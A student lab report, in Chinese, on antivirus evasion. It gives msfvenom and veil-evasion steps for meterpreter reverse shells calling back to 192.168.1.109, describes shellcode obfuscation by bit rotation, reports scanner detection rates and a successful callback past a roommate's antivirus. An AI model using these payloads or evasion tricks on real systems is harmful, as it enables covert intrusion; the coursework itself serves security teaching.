5213 Exp3 免杀原理与实践

5213 Exp3 免杀原理与实践

任务一：正确使用msf编码器，msfvenom生成如jar之类的其余文件，veil-evasion，本身利用shellcode编程等免杀工具或技巧

1. 使用msf编码器生成jar包
   • 使用指令：msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.1.109 lport=5213 x> 5213_backjar.jar
     
   • 上传扫描的结果：
     
   • 结果彷佛还行
2. 使用veil-evasion生成反弹连接的可执行文件：
   • 下载安装好veil以后，进入veil依次输入：
     • use evasion
     • use python/meterpreter/rev_tcp //设置payload
     • set LHOST 192.168.1.109 //设置反弹链接IP
     • set LPORT 5213 //设置反弹端口5213
     • generate //生成
     • 5213LZM //程序名
     • 1 //默认选项
   • 但是个人出现了这样的问题，不知如何解决，但是根据终端提示，虽然没能生成可执行文件，可是生成了可执行文件的源码，因此，直接使用这个python源码来测试，回链成功：

3. 本身利用shellcode编程等免杀工具或技巧

   • 生成Shellcode：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=443 -f c
     
   • 编写C程序，并运行测试：

     • 在本身的codeblocks上编译运行，360出现了警告，将其添加到信任中便可
       

     • 运行：
       

     • 放到网上测试以后的结果只有百分之二十的识别出来了：
       

任务二：经过组合应用各类技术实现恶意代码免杀

• 经过每一个字节循环移位，来实现代码的隐藏，实现免杀。
  • 读取每一个Shellcode字节，并循环向左移位3位，从新输出整个code，在嵌入的代码里加上循环向右移位3位，然后执行。

  • 运行结果再次成功：
    

  • 放到网上测试以后的结果只有百分之十及4个杀毒软件库识别出来了：
    

  • 360木马查杀结果：
    

任务三：用另外一电脑实测，在杀软开启的状况下，可运行并回连成功，注明电脑的杀软名称与版本

• 本机用的是奇虎360安全卫士，上图能够看得出来，这个任务我是在室友的电脑上作的，它用的是安全管家：
  

• 下图是扫描的结果：
  

• 在同连寝室网的环境下，攻击成功：
  

任务四：基础问题回答

（1）杀软是如何检测出恶意代码的？

* 分析恶意程序的行为特征，分析其代码流将其性质归类于恶意代码

（2）免杀是作什么？

* 使恶意代码避免被查杀，也就是要掩盖恶意代码的特征

（3）免杀的基本方法有哪些？

* 免杀大概能够分为两种状况：
        1. 二进制的免杀（无源码），只能经过经过修改asm代码／二进制数据／其余数据来完成免杀。
        2. 有源码的免杀，能够经过修改源代码来完成免杀，也能够结合二进制免杀的技术。

  * 免杀也能够分为这两种状况：

      1. 静态文件免杀，被杀毒软件病毒库/云查杀了，也就是文件特征码在病毒库了。
      2. 动态行为免杀，运行中执行的某些行为被杀毒软件拦截报读。

任务五：实践总结与体会

* 要想保证本身的计算机环境安全，不能简单的彻底信任杀毒软件，保不齐杀毒软件谦虚了一下，计算机就可能中毒了。

  * 离实战还缺些什么技术或步骤？
      * 将后门程序注入受害机，以及让其如何自启动。